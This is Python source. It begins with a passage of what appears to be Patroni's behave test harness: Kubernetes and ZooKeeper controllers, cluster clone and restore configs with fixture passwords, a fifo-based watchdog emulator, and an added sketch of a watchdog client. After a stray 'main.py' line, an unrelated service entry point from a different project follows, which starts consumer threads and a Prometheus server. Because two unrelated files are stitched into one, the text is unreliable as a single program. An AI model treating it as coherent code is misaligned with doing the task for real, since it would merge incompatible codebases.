        os.environ['PATRONI_KUBERNETES_LABELS'] = json.dumps(self._labels)
        os.environ['PATRONI_KUBERNETES_USE_ENDPOINTS'] = 'true'
        from kubernetes import client as k8s_client, config as k8s_config
        k8s_config.load_kube_config(context='local')
        self._client = k8s_client
        self._api = self._client.CoreV1Api()

    def _start(self):
        pass

    def create_pod(self, name, scope):
        labels = self._labels.copy()
        labels['cluster-name'] = scope
        metadata = self._client.V1ObjectMeta(namespace=self._namespace, name=name, labels=labels)
        spec = self._client.V1PodSpec(containers=[self._client.V1Container(name=name, image='empty')])
        body = self._client.V1Pod(metadata=metadata, spec=spec)
        self._api.create_namespaced_pod(self._namespace, body)

    def delete_pod(self, name):
        try:
            self._api.delete_namespaced_pod(name, self._namespace, self._client.V1DeleteOptions())
        except:
            pass
        while True:
            try:
                self._api.read_namespaced_pod(name, self._namespace)
            except:
                break

    def query(self, key, scope='batman'):
        if key.startswith('members/'):
            pod = self._api.read_namespaced_pod(key[8:], self._namespace)
            return (pod.metadata.annotations or {}).get('status', '')
        else:
            try:
                e = self._api.read_namespaced_endpoints(scope + ('' if key == 'leader' else '-' + key),
                                                        self._namespace)
                if key == 'leader':
                    return e.metadata.annotations[key]
                else:
                    return json.dumps(e.metadata.annotations)
            except:
                return None

    def cleanup_service_tree(self):
        try:
            self._api.delete_collection_namespaced_pod(self._namespace, label_selector=self._label_selector)
        except:
            pass
        try:
            self._api.delete_collection_namespaced_endpoints(self._namespace,
                                                             label_selector=self._label_selector)
        except:
            pass
        while True:
            result = self._api.list_namespaced_pod(self._namespace, label_selector=self._label_selector)
            if len(result.items) < 1:
                break

    def _is_running(self):
        return True


class ZooKeeperController(AbstractDcsController):

    """ handles all zookeeper related tasks, used for the tests setup and cleanup """

    def __init__(self, context, export_env=True):
        super(ZooKeeperController, self).__init__(context, False)
        if export_env:
            os.environ['PATRONI_ZOOKEEPER_HOSTS'] = "'localhost:2181'"
        self._client = kazoo.client.KazooClient()

    def _start(self):
        pass  # TODO: implement later

    def query(self, key, scope='batman'):
        try:
            return self._client.get(self.path(key, scope))[0].decode('utf-8')
        except kazoo.exceptions.NoNodeError:
            return None

    def cleanup_service_tree(self):
        try:
            self._client.delete(self.path(scope=''), recursive=True)
        except kazoo.exceptions.NoNodeError:
            return
        except Exception as e:
            assert False, "exception when cleaning up zookeeper contents: {0}".format(e)

    def _is_running(self):
        # zookeeper may be running even if we didn't start it ourselves
        if self._client.connected:
            return True
        try:
            return self._client.start(1) or True
        except Exception:
            return False


class ExhibitorController(ZooKeeperController):

    def __init__(self, context):
        super(ExhibitorController, self).__init__(context, False)
        os.environ.update({'PATRONI_EXHIBITOR_HOSTS': 'localhost', 'PATRONI_EXHIBITOR_PORT': '8181'})


class PatroniPoolController(object):

    BACKUP_SCRIPT = 'features/backup_create.sh'

    def __init__(self, context):
        self._context = context
        self._dcs = None
        self._output_dir = None
        self._patroni_path = None
        self._processes = {}
        self.create_and_set_output_directory('')
        self.known_dcs = {subclass.name(): subclass for subclass in AbstractDcsController.get_subclasses()}

    @property
    def patroni_path(self):
        if self._patroni_path is None:
            cwd = os.path.realpath(__file__)
            while True:
                cwd, entry = os.path.split(cwd)
                if entry == 'features' or cwd == '/':
                    break
            self._patroni_path = cwd
        return self._patroni_path

    @property
    def output_dir(self):
        return self._output_dir

    def start(self, name, max_wait_limit=20, custom_config=None):
        if name not in self._processes:
            self._processes[name] = PatroniController(self._context, name, self.patroni_path,
                                                      self._output_dir, custom_config)
        self._processes[name].start(max_wait_limit)

    def __getattr__(self, func):
        if func not in ['stop', 'query', 'write_label', 'read_label', 'check_role_has_changed_to',
                        'add_tag_to_config', 'get_watchdog', 'database_is_running', 'checkpoint_hang',
                        'patroni_hang', 'terminate_backends', 'backup']:
            raise AttributeError("PatroniPoolController instance has no attribute '{0}'".format(func))

        def wrapper(name, *args, **kwargs):
            return getattr(self._processes[name], func)(*args, **kwargs)
        return wrapper

    def stop_all(self):
        for ctl in self._processes.values():
            ctl.cancel_background()
            ctl.stop()
        self._processes.clear()

    def create_and_set_output_directory(self, feature_name):
        feature_dir = os.path.join(self.patroni_path, 'features/output', feature_name.replace(' ', '_'))
        if os.path.exists(feature_dir):
            shutil.rmtree(feature_dir)
        os.makedirs(feature_dir)
        self._output_dir = feature_dir

    def clone(self, from_name, cluster_name, to_name):
        f = self._processes[from_name]
        custom_config = {
            'scope': cluster_name,
            'bootstrap': {
                'method': 'pg_basebackup',
                'pg_basebackup': {
                    'command': self.BACKUP_SCRIPT + ' --walmethod=stream --dbname=' + f.backup_source
                },
                'dcs': {
                    'postgresql': {
                        'parameters': {
                            'max_connections': 101
                        }
                    }
                }
            },
            'postgresql': {
                'parameters': {
                    'archive_mode': 'on',
                    'archive_command': 'mkdir -p {0} && test ! -f {0}/%f && cp %p {0}/%f'.format(
                        os.path.join(self._output_dir, 'wal_archive'))
                },
                'authentication': {
                    'superuser': {'password': 'zalando1'},
                    'replication': {'password': 'rep-pass1'}
                }
            }
        }
        self.start(to_name, custom_config=custom_config)

    def bootstrap_from_backup(self, name, cluster_name):
        custom_config = {
            'scope': cluster_name,
            'bootstrap': {
                'method': 'backup_restore',
                'backup_restore': {
                    'command': 'features/backup_restore.sh --sourcedir=' +
                               os.path.join(self._output_dir, 'basebackup'),
                    'recovery_conf': {
                        'recovery_target_action': 'promote',
                        'recovery_target_timeline': 'latest',
                        'restore_command': 'cp {0}/wal_archive/%f %p'.format(self._output_dir)
                    }
                }
            },
            'postgresql': {
                'authentication': {
                    'superuser': {'password': 'zalando2'},
                    'replication': {'password': 'rep-pass2'}
                }
            }
        }
        self.start(name, custom_config=custom_config)

    @property
    def dcs(self):
        if self._dcs is None:
            self._dcs = os.environ.pop('DCS', 'etcd')
            assert self._dcs in self.known_dcs, 'Unsupported dcs: ' + self._dcs
        return self._dcs


class WatchdogMonitor(object):
    """Testing harness for emulating a watchdog device as a named pipe.

    Because we can't easily emulate ioctl's, we require a custom driver on the Patroni side.
    The device takes no action; it only notes whether it was pinged and/or triggered.
    """

    def __init__(self, name, work_directory, output_dir):
        self.fifo_path = os.path.join(work_directory, 'data', 'watchdog.{0}.fifo'.format(name))
        self.fifo_file = None
        self._stop_requested = False  # Relying on bool assignment being atomic
        self._thread = None
        self.last_ping = None
        self.was_pinged = False
        self.was_closed = False
        self._was_triggered = False
        self.timeout = 60
        self._log_file = open(os.path.join(output_dir, 'watchdog.{0}.log'.format(name)), 'w')
        self._log("watchdog {0} initialized".format(name))

    def _log(self, msg):
        tstamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")
        self._log_file.write("{0}: {1}\n".format(tstamp, msg))

    def start(self):
        assert self._thread is None
        self._stop_requested = False
        self._log("starting fifo {0}".format(self.fifo_path))
        fifo_dir = os.path.dirname(self.fifo_path)
        if os.path.exists(self.fifo_path):
            os.unlink(self.fifo_path)
        elif not os.path.exists(fifo_dir):
            os.mkdir(fifo_dir)
        os.mkfifo(self.fifo_path)
        self.last_ping = time.time()
        self._thread = threading.Thread(target=self.run)
        self._thread.start()

    def run(self):
        try:
            while not self._stop_requested:
                self._log("opening")
                self.fifo_file = os.open(self.fifo_path, os.O_RDONLY)
                try:
                    self._log("Fifo {0} connected".format(self.fifo_path))
                    self.was_closed = False
                    while not self._stop_requested:
                        c = os.read(self.fifo_file, 1)

                        if c == b'X':
                            self._log("Stop requested")
                            return
                        elif c == b'':
                            self._log("Pipe closed")
                            break
                        elif c == b'C':
                            command = b''
                            c = os.read(self.fifo_file, 1)
                            while c != b'\n' and c != b'':
                                command += c
                                c = os.read(self.fifo_file, 1)
                            command = command.decode('utf8')
                            if command.startswith('timeout='):
                                self.timeout = int(command.split('=')[1])
                                self._log("timeout={0}".format(self.timeout))
                        elif c in [b'V', b'1']:
                            cur_time = time.time()
                            if cur_time - self.last_ping > self.timeout:
                                self._log("Triggered")
                                self._was_triggered = True
                            if c == b'V':
                                self._log("magic close")
                                self.was_closed = True
                            elif c == b'1':
                                self.was_pinged = True
                                self._log("ping after {0} seconds".format(cur_time - (self.last_ping or cur_time)))
                            self.last_ping = cur_time
                        else:
                            self._log('Unknown command {0} received from fifo'.format(c))
                finally:
                    self.was_closed = True
                    self._log("closing")
                    os.close(self.fifo_file)
        except Exception as e:
            self._log("Error {0}".format(e))
        finally:
            self._log("stopping")
            self._log_file.flush()
            if os.path.exists(self.fifo_path):
                os.unlink(self.fifo_path)

    def stop(self):
        self._log("Monitor stop")
        self._stop_requested = True
        try:
            if os.path.exists(self.fifo_path):
                fd = os.open(self.fifo_path, os.O_WRONLY)
                os.write(fd, b'X')
                os.close(fd)
        except Exception as e:
            self._log("err while closing: {0}".format(str(e)))
        if self._thread:
            self._thread.join()
            self._thread = None

    def reset(self):
        self._log("reset")
        self.was_pinged = self.was_closed = self._was_triggered = False

    @property
    def was_triggered(self):
        delta = time.time() - self.last_ping
        triggered = self._was_triggered or not self.was_closed and delta > self.timeout
        self._log("triggered={0}, {1}s left".format(triggered, self.timeout - delta))
        return triggered


# actions to execute on start/stop of the tests and before running individual features
def before_all(context):
    os.environ.update({'PATRONI_RESTAPI_USERNAME': 'username', 'PATRONI_RESTAPI_PASSWORD': 'password'})
    context.ci = 'TRAVIS_BUILD_NUMBER' in os.environ or 'BUILD_NUMBER' in os.environ
    context.timeout_multiplier = 2 if context.ci else 1
    context.pctl = PatroniPoolController(context)
    context.dcs_ctl = context.pctl.known_dcs[context.pctl.dcs](context)
    context.dcs_ctl.start()
    try:
        context.dcs_ctl.cleanup_service_tree()
    except AssertionError:  # after_all handlers won't be executed in before_all
        context.dcs_ctl.stop()
        raise


def after_all(context):
    context.dcs_ctl.stop()
    subprocess.call(['coverage', 'combine'])
    subprocess.call(['coverage', 'report'])


def before_feature(context, feature):
    """ create per-feature output directory to collect Patroni and PostgreSQL logs """
    context.pctl.create_and_set_output_directory(feature.name)


def after_feature(context, feature):
    """ stop all Patronis, remove their data directory and cleanup the keys in etcd """
    context.pctl.stop_all()
    shutil.rmtree(os.path.join(context.pctl.patroni_path, 'data'))
    context.dcs_ctl.cleanup_service_tree()
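
# Illustrative sketch, not part of the original harness: a minimal client for the fifo
# protocol implemented by WatchdogMonitor above. It assumes the byte-level commands
# handled in WatchdogMonitor.run(): b'C' followed by a command terminated by b'\n'
# (only 'timeout=N' is understood), b'1' for a keepalive ping, b'V' for a "magic close",
# and b'X' to stop the monitor thread. The function name is hypothetical and is only
# meant to illustrate the protocol.
def example_watchdog_session(fifo_path):
    fd = os.open(fifo_path, os.O_WRONLY)
    try:
        os.write(fd, b'Ctimeout=30\n')  # set the emulated watchdog timeout to 30 seconds
        os.write(fd, b'1')              # keepalive ping: the monitor records last_ping
        os.write(fd, b'V')              # magic close: the monitor marks the device as cleanly closed
    finally:
        os.close(fd)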
main.py
from ros.lib.cw_logging import commence_cw_log_streaming
from ros.processor.inventory_events_consumer import InventoryEventsConsumer
from ros.processor.insights_engine_result_consumer import InsightsEngineResultConsumer
from ros.processor.garbage_collector import GarbageCollector
from prometheus_client import start_http_server
import threading
from ros.lib.config import METRICS_PORT


def process_engine_results():
    processor = InsightsEngineResultConsumer()
    processor.run()


def events_processor():
    processor = InventoryEventsConsumer()
    processor.run()


def garbage_collector():
    collector = GarbageCollector()
    collector.run()


if __name__ == "__main__":
    commence_cw_log_streaming('ros-processor')
    # Start processing in three separate threads
    engine_results = threading.Thread(name='process-engine-results', target=process_engine_results)
    events = threading.Thread(name='events-processor', target=events_processor)
    collector = threading.Thread(name='garbage-collector', target=garbage_collector)
    events.start()
    engine_results.start()
    collector.start()

    # Expose Prometheus metrics; start_http_server serves them from its own daemon thread
    start_http_server(int(METRICS_PORT))

    # Wait for the worker threads to finish
    events.join()
    engine_results.join()
    collector.join()